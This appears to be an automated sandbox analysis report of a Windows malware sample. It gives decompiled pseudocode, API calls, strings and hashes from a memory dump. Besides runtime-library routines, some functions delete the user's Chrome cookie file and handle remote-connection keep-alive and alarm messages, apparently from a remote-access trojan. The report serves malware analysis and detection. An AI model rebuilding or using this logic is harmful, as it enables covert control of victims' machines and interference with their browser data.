                      					if(_a8 != 1 || SetFilePointer(_t30, _t21, _t21, 2) != 0xffffffff) {
                      						if(WriteFile(_t30, _v8, _t27,  &_v12, _t21) != 0) {
                      							_t21 = 1;
                      						}
                      						CloseHandle(_t30);
                      						_t16 = _t21;
                      						goto L13;
                      					} else {
                      						CloseHandle(_t30);
                      						goto L6;
                      					}
                      				} else {
                      					L6:
                      					_t16 = 0;
                      					L13:
                      					return _t16;
                      				}
                      			}

                      APIs
                      • CreateFileW.KERNEL32(i]t,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,00757A71,00000000,00000000), ref: 00757986
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00757A71,00000000,00000000,00000000,00000004,?,00745D69,00000000), ref: 007579A2
                      • CloseHandle.KERNEL32(00000000,?,00757A71,00000000,00000000,00000000,00000004,?,00745D69,00000000), ref: 007579AE
                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,00757A71,00000000,00000000,00000000,00000004,?,00745D69,00000000), ref: 007579C0
                      • CloseHandle.KERNEL32(00000000,?,00757A71,00000000,00000000,00000000,00000004,?,00745D69,00000000), ref: 007579CD
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$CloseHandle$CreatePointerWrite
                      • String ID: i]t
                      • API String ID: 1852769593-3761946497
                      • Opcode ID: 6af21efc6b8d9c4ac4ed13b0edb59242706cf7f1c018305b159325b553082e5b
                      • Instruction ID: b613696a8d790cbdfc9e7582c44f279488b0d23f4a841ffea2312caf5ee92a3d
                      • Opcode Fuzzy Hash: 6af21efc6b8d9c4ac4ed13b0edb59242706cf7f1c018305b159325b553082e5b
                      • Instruction Fuzzy Hash: 1A110675208019BFEB184F64BC89EFA776CEB06372F108216FD15D6190C7B8AE09C674
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0078917A(intOrPtr _a4) {
                      				void* _t18;
                      
                      				_t45 = _a4;
                      				if(_a4 != 0) {
                      					E00788EC1(_t45, 7);
                      					E00788EC1(_t45 + 0x1c, 7);
                      					E00788EC1(_t45 + 0x38, 0xc);
                      					E00788EC1(_t45 + 0x68, 0xc);
                      					E00788EC1(_t45 + 0x98, 2);
                      					E007801F5( *((intOrPtr*)(_t45 + 0xa0)));
                      					E007801F5( *((intOrPtr*)(_t45 + 0xa4)));
                      					E007801F5( *((intOrPtr*)(_t45 + 0xa8)));
                      					E00788EC1(_t45 + 0xb4, 7);
                      					E00788EC1(_t45 + 0xd0, 7);
                      					E00788EC1(_t45 + 0xec, 0xc);
                      					E00788EC1(_t45 + 0x11c, 0xc);
                      					E00788EC1(_t45 + 0x14c, 2);
                      					E007801F5( *((intOrPtr*)(_t45 + 0x154)));
                      					E007801F5( *((intOrPtr*)(_t45 + 0x158)));
                      					E007801F5( *((intOrPtr*)(_t45 + 0x15c)));
                      					return E007801F5( *((intOrPtr*)(_t45 + 0x160)));
                      				}
                      				return _t18;
                      			}

                      APIs
                        • Part of subcall function 00788EC1: _free.LIBCMT ref: 00788EEA
                      • _free.LIBCMT ref: 007891C8
                        • Part of subcall function 007801F5: HeapFree.KERNEL32(00000000,00000000,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?), ref: 0078020B
                        • Part of subcall function 007801F5: GetLastError.KERNEL32(?,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?,?), ref: 0078021D
                      • _free.LIBCMT ref: 007891D3
                      • _free.LIBCMT ref: 007891DE
                      • _free.LIBCMT ref: 00789232
                      • _free.LIBCMT ref: 0078923D
                      • _free.LIBCMT ref: 00789248
                      • _free.LIBCMT ref: 00789253
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                      • Instruction ID: 43e0d2ef35dc0af02021f94f01ec38ccd2efc47d18976864a2c2f5a91a620bf8
                      • Opcode Fuzzy Hash: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                      • Instruction Fuzzy Hash: 8C11CC72DD0B08EEDAA0BBB0CC4EFCF779DAF04720F804815B399A6552DE79A5144791
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E007750B5(void* __ecx) {
                      				void* _t4;
                      				void* _t11;
                      				void* _t16;
                      				long _t25;
                      				void* _t28;
                      
                      				if( *0x7aa090 != 0xffffffff) {
                      					_t25 = GetLastError();
                      					_t11 = E00771BD8(__eflags,  *0x7aa090);
                      					__eflags = _t11 - 0xffffffff;
                      					if(_t11 == 0xffffffff) {
                      						L5:
                      						_t11 = 0;
                      					} else {
                      						__eflags = _t11;
                      						if(__eflags == 0) {
                      							_t4 = E00771C12(__eflags,  *0x7aa090, 0xffffffff);
                      							_pop(_t16);
                      							__eflags = _t4;
                      							if(_t4 != 0) {
                      								_t28 = E0077F348(_t16, 1, 0x28);
                      								__eflags = _t28;
                      								if(__eflags == 0) {
                      									L8:
                      									_t11 = 0;
                      									E00771C12(__eflags,  *0x7aa090, 0);
                      								} else {
                      									__eflags = E00771C12(__eflags,  *0x7aa090, _t28);
                      									if(__eflags != 0) {
                      										_t11 = _t28;
                      										_t28 = 0;
                      										__eflags = 0;
                      									} else {
                      										goto L8;
                      									}
                      								}
                      								E007801F5(_t28);
                      							} else {
                      								goto L5;
                      							}
                      						}
                      					}
                      					SetLastError(_t25);
                      					return _t11;
                      				} else {
                      					return 0;
                      				}
                      			}

                      APIs
                      • GetLastError.KERNEL32(?,?,007750AC,007721F2), ref: 007750C3
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007750D1
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007750EA
                      • SetLastError.KERNEL32(00000000,?,007750AC,007721F2), ref: 0077513C
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: 20d9fc86b905ef9c385fb1cea39458e19e8b3ad0a124504c0b7ea2581560bebe
                      • Instruction ID: c7885d6492465b3a821f2650ddf4023db6ddbf643372940a099125423637d634
                      • Opcode Fuzzy Hash: 20d9fc86b905ef9c385fb1cea39458e19e8b3ad0a124504c0b7ea2581560bebe
                      • Instruction Fuzzy Hash: 7701D832149715EEAF562BBC6C8AA2B2755DB427F5760C229F11C410E1FF9D4C01A394
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E00749F83(void* __edi, void* __eflags) {
                      				char _v28;
                      				char _v52;
                      				void* __ebx;
                      				void* __ebp;
                      				long _t18;
                      				void* _t20;
                      				void* _t21;
                      				void* _t28;
                      				void* _t31;
                      				void* _t32;
                      
                      				_t35 = __eflags;
                      				_t31 = __edi;
                      				_t30 = E00742084(_t20,  &_v52, E0077988A(_t20, __eflags, "UserProfile"));
                      				E00745343(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                      				E00741FC7();
                      				if(DeleteFileA(E00741F95( &_v28)) != 0) {
                      					_t28 = _t32 - 0x18;
                      					_push("\n[Chrome Cookies found, cleared!]");
                      					goto L6;
                      				} else {
                      					_t18 = GetLastError();
                      					if(_t18 == 0 || _t18 == 1) {
                      						_t28 = _t32 - 0x18;
                      						_push("\n[Chrome Cookies not found]");
                      						L6:
                      						E00742084(_t20, _t28);
                      						E0074A6EF(_t20, _t30, __eflags);
                      						_t21 = 1;
                      					} else {
                      						_t21 = 0;
                      					}
                      				}
                      				E00741FC7();
                      				return _t21;
                      			}

                      APIs
                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 00749FBF
                      • GetLastError.KERNEL32 ref: 00749FC9
                      Strings
                      • UserProfile, xrefs: 00749F8F
                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 00749F8A
                      • [Chrome Cookies found, cleared!], xrefs: 00749FEF
                      • [Chrome Cookies not found], xrefs: 00749FE3
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: DeleteErrorFileLast
                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      • API String ID: 2018770650-304995407
                      • Opcode ID: ff011247accdbaddb48276c44a964049e455da479e8f851ffbe25db48bb9984b
                      • Instruction ID: 88f7a08e65848fc76640cd1201745fda3121020bd019b164a17c6c4f62f42ec2
                      • Opcode Fuzzy Hash: ff011247accdbaddb48276c44a964049e455da479e8f851ffbe25db48bb9984b
                      • Instruction Fuzzy Hash: D501D671685109A78F08B774EC5F8BF7B24B9133007900229F902D61E2FF1D5A4AC6D2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 86%
                      			E0074511B(void* __ecx, void* __edi, char _a4) {
                      				void* _t17;
                      				void* _t22;
                      				void* _t23;
                      
                      				_t22 = __ecx;
                      				if( *((char*)(__ecx + 0x50)) == 0) {
                      					return 0;
                      				}
                      				if(_a4 == 0) {
                      					_t24 = _t23 - 0x18;
                      					E00742084(_t17, _t23 - 0x18, "Connection KeepAlive disabled");
                      					E00742084(_t17, _t24 - 0x18, "[WARNING]");
                      					E00756C80(_t17, __edi);
                      				}
                      				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
                      				SetEvent( *(_t22 + 0x54));
                      				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
                      				CloseHandle( *(_t22 + 0x58));
                      				return 1;
                      			}

                      APIs
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,007AC138,?,00744CA9,00000001,007AC138,00744C56,00000000,00000000,00000000), ref: 00745159
                      • SetEvent.KERNEL32(?,?,00744CA9,00000001,007AC138,00744C56,00000000,00000000,00000000), ref: 00745165
                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00744CA9,00000001,007AC138,00744C56,00000000,00000000,00000000), ref: 00745170
                      • CloseHandle.KERNEL32(?,?,00744CA9,00000001,007AC138,00744C56,00000000,00000000,00000000), ref: 00745179
                        • Part of subcall function 00756C80: GetLocalTime.KERNEL32(00000000), ref: 00756C9A
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                      • String ID: Connection KeepAlive disabled$[WARNING]
                      • API String ID: 2993684571-804309475
                      • Opcode ID: 7a9e075594e558670750ab38933c5a0866a33c5ac3ac245f243b165d0829716f
                      • Instruction ID: bb3248b71820754cc2bd4c10bcb6da15176a0fd1ddb8d9c0f438129915a5ecf3
                      • Opcode Fuzzy Hash: 7a9e075594e558670750ab38933c5a0866a33c5ac3ac245f243b165d0829716f
                      • Instruction Fuzzy Hash: 17F0F6715003447FDF103BB49C0EA767F98EB02324F40451AFD42C25B2CBB9985187A2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 86%
                      			E00756737(WCHAR* __ecx) {
                      				void* __edi;
                      				void* _t7;
                      				void* _t11;
                      				WCHAR* _t13;
                      				void* _t15;
                      
                      				_t16 = _t15 - 0x18;
                      				_t13 = __ecx;
                      				E00742084(_t7, _t15 - 0x18, "Alarm has been triggered!");
                      				E00742084(_t7, _t16 - 0x18, "[ALARM]");
                      				E00756C80(_t7, _t11);
                      				PlaySoundW(_t13, GetModuleHandleA(0), 0x20009);
                      				Sleep(0x2710);
                      				return PlaySoundW(0, 0, 0);
                      			}

                      APIs
                        • Part of subcall function 00756C80: GetLocalTime.KERNEL32(00000000), ref: 00756C9A
                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00756769
                      • PlaySoundW.WINMM(00000000,00000000), ref: 00756777
                      • Sleep.KERNEL32(00002710), ref: 0075677E
                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00756787
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: PlaySound$HandleLocalModuleSleepTime
                      • String ID: Alarm has been triggered!$[ALARM]
                      • API String ID: 614609389-1190268461
                      • Opcode ID: cab040b1ee9ebbda57d0427d1ee21146e4e1320d3e21439fed66ff0ff6ccddf7
                      • Instruction ID: 40a50aa0a8ec30a80a3f55bbc41079bc2c688a371a7c992c909fe817b29e6d9a
                      • Opcode Fuzzy Hash: cab040b1ee9ebbda57d0427d1ee21146e4e1320d3e21439fed66ff0ff6ccddf7
                      • Instruction Fuzzy Hash: A7E0D822B00020775520337A6C0FC6F3D28DFC3B20741415BFA045B192CD480812C3F3
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 69%
                      			E00775799(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
                      				intOrPtr _v0;
                      				char _v8;
                      				signed int _v12;
                      				char _v16;
                      				signed int _v20;
                      				char _v24;
                      				void* __esi;
                      				void* __ebp;
                      				signed int _t61;
                      				void* _t64;
                      				signed int _t67;
                      				signed int _t69;
                      				signed int _t70;
                      				signed int _t73;
                      				signed int _t75;
                      				signed int _t77;
                      				signed int _t78;
                      				intOrPtr _t80;
                      				signed int _t81;
                      				void* _t82;
                      				signed int _t84;
                      				void* _t85;
                      				signed int _t87;
                      				signed int _t93;
                      				signed int _t102;
                      				void* _t104;
                      				signed int _t107;
                      				signed int* _t110;
                      				signed int* _t111;
                      				intOrPtr* _t113;
                      				signed int _t118;
                      				signed int _t120;
                      				signed int _t123;
                      				void* _t125;
                      				signed int _t128;
                      				signed int _t131;
                      				signed int _t139;
                      				signed int _t145;
                      				void _t147;
                      				void* _t148;
                      				void* _t150;
                      				void* _t152;
                      				signed int _t153;
                      				signed int _t154;
                      				void* _t155;
                      				signed int _t156;
                      				signed int _t157;
                      				signed int _t158;
                      				intOrPtr _t159;
                      
                      				_t139 = __edx;
                      				_t155 = _a4;
                      				if(_t155 == 0) {
                      					_t113 = E0077A504();
                      					_t159 = 0x16;
                      					 *_t113 = _t159;
                      					E0077695D();
                      					return _t159;
                      				}
                      				_push(__edi);
                      				_t123 = 9;
                      				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
                      				_t145 = _a8;
                      				__eflags = _t145;
                      				if(_t145 == 0) {
                      					_t111 = E0077A504();
                      					_t158 = 0x16;
                      					 *_t111 = _t158;
                      					E0077695D();
                      					_t78 = _t158;
                      					L12:
                      					return _t78;
                      				}
                      				_push(__ebx);
                      				__eflags =  *(_t145 + 4);
                      				if(__eflags <= 0) {
                      					if(__eflags < 0) {
                      						L10:
                      						_t110 = E0077A504();
                      						_t157 = 0x16;
                      						 *_t110 = _t157;
                      						_t78 = _t157;
                      						L11:
                      						goto L12;
                      					}
                      					__eflags =  *_t145;
                      					if( *_t145 < 0) {
                      						goto L10;
                      					}
                      				}
                      				_t64 = 7;
                      				__eflags =  *(_t145 + 4) - _t64;
                      				if(__eflags >= 0) {
                      					if(__eflags > 0) {
                      						goto L10;
                      					}
                      					__eflags =  *_t145 - 0x93406fff;
                      					if(__eflags > 0) {
                      						goto L10;
                      					}
                      				}
                      				E0078309E(0, _t145, _t155, __eflags);
                      				_v12 = 0;
                      				_v16 = 0;
                      				_v8 = 0;
                      				_t67 = E007828D3( &_v12);
                      				_pop(_t125);
                      				__eflags = _t67;
                      				if(_t67 == 0) {
                      					_t75 = E007828FF( &_v16);
                      					_pop(_t125);
                      					__eflags = _t75;
                      					if(_t75 == 0) {
                      						_t77 = E0078292B( &_v8);
                      						_pop(_t125);
                      						__eflags = _t77;
                      						if(_t77 == 0) {
                      							_t118 =  *(_t145 + 4);
                      							_t128 =  *_t145;
                      							__eflags = _t118;
                      							if(__eflags < 0) {
                      								L28:
                      								_push(_t145);
                      								_push(_t155);
                      								_t78 = E0077C6D7();
                      								__eflags = _t78;
                      								if(_t78 != 0) {
                      									goto L11;
                      								}
                      								__eflags = _v12;
                      								asm("cdq");
                      								_t147 =  *_t155;
                      								_t120 = _t139;
                      								if(__eflags == 0) {
                      									L32:
                      									_t80 = _v8;
                      									L33:
                      									asm("cdq");
                      									_t148 = _t147 - _t80;
                      									asm("sbb ebx, edx");
                      									_t81 = E00790C70(_t148, _t120, 0x3c, 0);
                      									 *_t155 = _t81;
                      									__eflags = _t81;
                      									if(_t81 < 0) {
                      										_t148 = _t148 + 0xffffffc4;
                      										 *_t155 = _t81 + 0x3c;
                      										asm("adc ebx, 0xffffffff");
                      									}
                      									_t82 = E00790BC0(_t148, _t120, 0x3c, 0);
                      									_t121 = _t139;
                      									_t28 = _t155 + 4; // 0x848d0079
                      									asm("cdq");
                      									_t150 = _t82 +  *_t28;
                      									asm("adc ebx, edx");
                      									_t84 = E00790C70(_t150, _t139, 0x3c, 0);
                      									 *(_t155 + 4) = _t84;
                      									__eflags = _t84;
                      									if(_t84 < 0) {
                      										_t150 = _t150 + 0xffffffc4;
                      										 *(_t155 + 4) = _t84 + 0x3c;
                      										asm("adc ebx, 0xffffffff");
                      									}
                      									_t85 = E00790BC0(_t150, _t121, 0x3c, 0);
                      									_t122 = _t139;
                      									_t31 = _t155 + 8; // 0xa824
                      									asm("cdq");
                      									_t152 = _t85 +  *_t31;
                      									asm("adc ebx, edx");
                      									_t87 = E00790C70(_t152, _t139, 0x18, 0);
                      									 *(_t155 + 8) = _t87;
                      									__eflags = _t87;
                      									if(_t87 < 0) {
                      										_t152 = _t152 + 0xffffffe8;
                      										 *(_t155 + 8) = _t87 + 0x18;
                      										asm("adc ebx, 0xffffffff");
                      									}
                      									_t131 = E00790BC0(_t152, _t122, 0x18, 0);
                      									__eflags = _t139;
                      									if(__eflags < 0) {
                      										L48:
                      										_t44 = _t155 + 0x18; // 0xa024848d
                      										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
                      										asm("cdq");
                      										_t153 = 7;
                      										_t51 = _t155 + 0xc; // 0x50506a00
                      										_t93 =  *_t51;
                      										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
                      										__eflags = _t93;
                      										if(_t93 > 0) {
                      											goto L43;
                      										}
                      										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
                      										 *(_t155 + 0xc) = _t93 + 0x1f;
                      										_t55 = _t131 + 0x16d; // 0x16d
                      										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
                      										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
                      										goto L44;
                      									} else {
                      										if(__eflags > 0) {
                      											L42:
                      											_t34 = _t155 + 0x18; // 0xa024848d
                      											asm("cdq");
                      											_t154 = 7;
                      											_t39 = _t155 + 0xc;
                      											 *_t39 =  *(_t155 + 0xc) + _t131;
                      											__eflags =  *_t39;
                      											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
                      											L43:
                      											_t42 = _t155 + 0x1c;
                      											 *_t42 =  *(_t155 + 0x1c) + _t131;
                      											__eflags =  *_t42;
                      											L44:
                      											_t78 = 0;
                      											goto L11;
                      										}
                      										__eflags = _t131;
                      										if(_t131 == 0) {
                      											__eflags = _t139;
                      											if(__eflags > 0) {
                      												goto L44;
                      											}
                      											if(__eflags < 0) {
                      												goto L48;
                      											}
                      											__eflags = _t131;
                      											if(_t131 >= 0) {
                      												goto L44;
                      											}
                      											goto L48;
                      										}
                      										goto L42;
                      									}
                      								}
                      								_push(_t155);
                      								_t102 = E007830EF(_t120, _t147, _t155, __eflags);
                      								__eflags = _t102;
                      								if(_t102 == 0) {
                      									goto L32;
                      								}
                      								_t80 = _v8 + _v16;
                      								 *((intOrPtr*)(_t155 + 0x20)) = 1;
                      								goto L33;
                      							}
                      							if(__eflags > 0) {
                      								L20:
                      								_t104 = 7;
                      								__eflags = _t118 - _t104;
                      								if(__eflags > 0) {
                      									goto L28;
                      								}
                      								if(__eflags < 0) {
                      									L23:
                      									asm("cdq");
                      									_push( &_v24);
                      									asm("sbb ebx, edx");
                      									_v24 = _t128 - _v8;
                      									_push(_t155);
                      									_v20 = _t118;
                      									_t78 = E0077C6D7();
                      									__eflags = _t78;
                      									if(_t78 != 0) {
                      										goto L11;
                      									}
                      									__eflags = _v12 - _t78;
                      									if(__eflags == 0) {
                      										goto L44;
                      									}
                      									_push(_t155);
                      									_t107 = E007830EF(_t118, _t145, _t155, __eflags);
                      									__eflags = _t107;
                      									if(_t107 == 0) {
                      										goto L44;
                      									}
                      									asm("cdq");
                      									_v24 = _v24 - _v16;
                      									_push( &_v24);
                      									asm("sbb [ebp-0x10], edx");
                      									_push(_t155);
                      									_t78 = E0077C6D7();
                      									__eflags = _t78;
                      									if(_t78 != 0) {
                      										goto L11;
                      									}
                      									 *((intOrPtr*)(_t155 + 0x20)) = 1;
                      									goto L44;
                      								}
                      								__eflags = _t128 - 0x933c7b7f;
                      								if(_t128 >= 0x933c7b7f) {
                      									goto L28;
                      								}
                      								goto L23;
                      							}
                      							__eflags = _t128 - 0x3f480;
                      							if(_t128 <= 0x3f480) {
                      								goto L28;
                      							}
                      							goto L20;
                      						}
                      					}
                      				}
                      				_push(0);
                      				_push(0);
                      				_push(0);
                      				_push(0);
                      				_push(0);
                      				E0077698A();
                      				asm("int3");
                      				_push(_t155);
                      				_t69 = E0077C672(_t125);
                      				_t156 = _t69;
                      				__eflags = _t156;
                      				if(_t156 != 0) {
                      					_push(_v0);
                      					_t70 = E00775799(0, _t139, _t145, _t156);
                      					asm("sbb eax, eax");
                      					_t73 =  !( ~_t70) & _t156;
                      					__eflags = _t73;
                      					return _t73;
                      				}
                      				return _t69;
                      			}
                      0x007759ce
                      0x007759ce
                      0x007759ce
                      0x007759d1
                      0x007759d1
                      0x00000000
                      0x007759d1
                      0x007759b9
                      0x007759bb
                      0x007759d8
                      0x007759da
                      0x00000000
                      0x00000000
                      0x007759dc
                      0x00000000
                      0x00000000
                      0x007759de
                      0x007759e0
                      0x00000000
                      0x00000000
                      0x00000000
                      0x007759e0
                      0x00000000
                      0x007759bb
                      0x007759b5
                      0x007758fe
                      0x007758ff
                      0x00775905
                      0x00775907
                      0x00000000
                      0x00000000
                      0x0077590c
                      0x0077590f
                      0x00000000
                      0x0077590f
                      0x00775861
                      0x0077586b
                      0x0077586d
                      0x0077586e
                      0x00775870
                      0x00000000
                      0x00000000
                      0x00775872
                      0x0077587c
                      0x0077587f
                      0x00775885
                      0x00775886
                      0x00775888
                      0x0077588b
                      0x0077588c
                      0x0077588f
                      0x00775896
                      0x00775898
                      0x00000000
                      0x00000000
                      0x0077589e
                      0x007758a1
                      0x00000000
                      0x00000000
                      0x007758a7
                      0x007758a8
                      0x007758ae
                      0x007758b0
                      0x00000000
                      0x00000000
                      0x007758b9
                      0x007758ba
                      0x007758c0
                      0x007758c1
                      0x007758c4
                      0x007758c5
                      0x007758cc
                      0x007758ce
                      0x00000000
                      0x00000000
                      0x007758d4
                      0x00000000
                      0x007758d4
                      0x00775874
                      0x0077587a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0077587a
                      0x00775863
                      0x00775869
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00775869
                      0x00775852
                      0x00775840
                      0x00775a18
                      0x00775a19
                      0x00775a1a
                      0x00775a1b
                      0x00775a1c
                      0x00775a1d
                      0x00775a22
                      0x00775a28
                      0x00775a29
                      0x00775a2e
                      0x00775a30
                      0x00775a32
                      0x00775a34
                      0x00775a38
                      0x00775a40
                      0x00775a45
                      0x00775a45
                      0x00000000
                      0x00775a45
                      0x00775a49

                      APIs
                      • __allrem.LIBCMT ref: 00775926
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00775942
                      • __allrem.LIBCMT ref: 00775959
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00775977
                      • __allrem.LIBCMT ref: 0077598E
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007759AC
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1992179935-0
                      • Opcode ID: 72cb9584bf9c46cebf665fcacbcb8dac0ae959ede31be18aeb0c43964b5390ae
                      • Instruction ID: a14371145118c894041c7bdcd54d34cf381385deec0446de36f3078b937047fe
                      • Opcode Fuzzy Hash: 72cb9584bf9c46cebf665fcacbcb8dac0ae959ede31be18aeb0c43964b5390ae
                      • Instruction Fuzzy Hash: 7D81F972600F06DBEF20AB78CC45B6A73E49F417B4F24C52AF519D6681E7B8E9008B91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E0077F14E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				char _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				char* _v44;
                      				char _v48;
                      				void* __ecx;
                      				signed int _t67;
                      				signed int _t70;
                      				signed int _t71;
                      				signed int _t75;
                      				intOrPtr _t76;
                      				signed int _t79;
                      				signed int _t86;
                      				intOrPtr _t88;
                      				signed int _t99;
                      				void* _t101;
                      				void* _t103;
                      				void* _t108;
                      				signed int _t112;
                      				signed int _t113;
                      				signed int _t116;
                      				signed int _t123;
                      				signed int _t125;
                      				intOrPtr _t126;
                      				signed int _t128;
                      				intOrPtr _t130;
                      				signed int _t131;
                      				void* _t135;
                      				void* _t136;
                      				void* _t138;
                      
                      				_t120 = __edx;
                      				_t97 = __ebx;
                      				_push(_t101);
                      				if(_a8 != 0) {
                      					_push(__esi);
                      					_push(__edi);
                      					_t123 = 0;
                      					_t67 = E0077AE14( &_v8, 0, 0, _a8, 0x7fffffff);
                      					_t136 = _t135 + 0x14;
                      					__eflags = _t67;
                      					if(_t67 == 0) {
                      						L5:
                      						_t128 = E0077F348(_t101, _v8, 2);
                      						_pop(_t103);
                      						__eflags = _t128;
                      						if(_t128 == 0) {
                      							L11:
                      							E007801F5(_t128);
                      							_t70 = _t123;
                      							goto L12;
                      						} else {
                      							_t71 = E0077AE14(_t123, _t128, _v8, _a8, 0xffffffff);
                      							_t136 = _t136 + 0x14;
                      							__eflags = _t71;
                      							if(_t71 == 0) {
                      								_t123 = E0077E4D0(_t97, _t103, _t120, _a4, _t128);
                      								goto L11;
                      							} else {
                      								__eflags = _t71 - 0x16;
                      								if(_t71 == 0x16) {
                      									goto L13;
                      								} else {
                      									__eflags = _t71 - 0x22;
                      									if(_t71 != 0x22) {
                      										goto L11;
                      									} else {
                      										goto L13;
                      									}
                      								}
                      							}
                      						}
                      					} else {
                      						__eflags = _t67 - 0x16;
                      						if(_t67 == 0x16) {
                      							L13:
                      							_push(_t123);
                      							_push(_t123);
                      							_push(_t123);
                      							_push(_t123);
                      							E0077698A();
                      							asm("int3");
                      							E0076FB60(0x7a8270, 0x1c);
                      							_t130 = _a4;
                      							_t75 = E0077F14E(_t97, _t120, _t123, _t130, _t130, _a8);
                      							_t108 = _t123;
                      							_t125 = _t75;
                      							__eflags = _t125;
                      							if(_t125 != 0) {
                      								_t76 = E00781CE2(_t97, _t108, _t120);
                      								_v40 = _t76;
                      								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
                      								_t110 =  *((intOrPtr*)(_t76 + 0x48));
                      								_v44 =  *((intOrPtr*)(_t76 + 0x48));
                      								_v32 = 0;
                      								_t79 = E0077B53B( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
                      								_t138 = _t136 + 0x18;
                      								__eflags = _t79;
                      								if(_t79 == 0) {
                      									L22:
                      									_t99 = E0077F98C(_t110, _v32 + 4);
                      									__eflags = _t99;
                      									if(_t99 == 0) {
                      										goto L15;
                      									} else {
                      										_t20 = _t99 + 4; // 0x4
                      										_v36 = _t20;
                      										_t110 =  &_v48;
                      										_t125 = 0;
                      										_t86 = E0077B53B( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
                      										_t138 = _t138 + 0x18;
                      										__eflags = _t86;
                      										if(_t86 == 0) {
                      											L29:
                      											_t126 = _v48;
                      											E0077F0DD(4);
                      											_pop(_t112);
                      											_v8 = _v8 & 0x00000000;
                      											_t131 = _t130 + _t130;
                      											_t113 = _t112 | 0xffffffff;
